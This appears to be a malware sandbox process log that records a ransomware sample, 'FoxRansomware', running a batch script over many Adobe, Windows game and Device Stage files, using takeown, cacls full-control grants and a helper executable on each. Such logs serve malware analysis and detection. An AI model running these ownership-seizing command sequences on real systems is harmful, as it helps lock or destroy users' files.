C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:4856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:4912
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:4864
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:5040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:4896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:4284
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:308
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4992
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:1808
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:3836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵PID:2296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:3744
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:3248
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:4688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:4492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵
- Modifies file permissions
PID:2032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "br.gif" -nobanner3⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "br.gif" -nobanner4⤵PID:4536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:4520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:4508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵PID:4564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "form_responses.gif" -nobanner3⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "form_responses.gif" -nobanner4⤵PID:2624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:3256
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:2312
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵
- Modifies file permissions
PID:3664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "review_email.gif" -nobanner3⤵PID:3676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "review_email.gif" -nobanner4⤵PID:3688
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:3448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:3200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵
- Modifies file permissions
PID:3272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "tr.gif" -nobanner3⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "tr.gif" -nobanner4⤵PID:2052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:5044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:3504
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:3344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:3280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:3352
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:3184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:5092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵PID:3364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:3268
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:3568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:3224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:1676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:2160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:3460
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:3592
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3668
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:3428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:1032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵
- Modifies file permissions
PID:2444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "can.fca" -nobanner3⤵PID:4640
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "can.fca" -nobanner4⤵PID:3632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:1244
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:3964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵PID:4744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "usa03.ths" -nobanner3⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "usa03.ths" -nobanner4⤵PID:3296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:2288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:3412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:3100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:4956
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:3356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:4940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:3192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵
- Modifies file permissions
PID:2752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:816
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:5100
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:2680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:3768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "superbar.png" -nobanner3⤵PID:3596
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "superbar.png" -nobanner4⤵PID:3640
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:2224
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:2236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Modifies file permissions
PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:2996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:1440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:3748
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:3892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:4660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "device.png" -nobanner3⤵PID:4988
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "device.png" -nobanner4⤵PID:3084
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:4644
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:1700
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:4060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:4544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:4720
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:4708
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:2084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:3976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "tasks.xml" -nobanner3⤵PID:3972
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "tasks.xml" -nobanner4⤵PID:324
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵PID:2244
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:3912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵PID:2320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "FreeCellMCE.png" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "FreeCellMCE.png" -nobanner4⤵PID:984
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵PID:1388
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:1436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵PID:1460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "HeartsMCE.png" -nobanner3⤵PID:4056
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "HeartsMCE.png" -nobanner4⤵PID:2692
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:5028
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:2136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:4448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "watermark.png" -nobanner3⤵PID:4300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "watermark.png" -nobanner4⤵PID:2508
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:3132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:2556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:4804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:2388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:3024
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵PID:544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:4596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Modifies file permissions
PID:4456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "MahjongMCE.png" -nobanner3⤵PID:2352
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "MahjongMCE.png" -nobanner4⤵PID:1992
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:4604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵
- Modifies file permissions
PID:2440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "directories.acrodata" -nobanner3⤵PID:920
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "directories.acrodata" -nobanner4⤵PID:2652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:2980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:4012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵PID:964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "behavior.xml" -nobanner3⤵PID:4040
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "behavior.xml" -nobanner4⤵PID:1232
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:4648
-
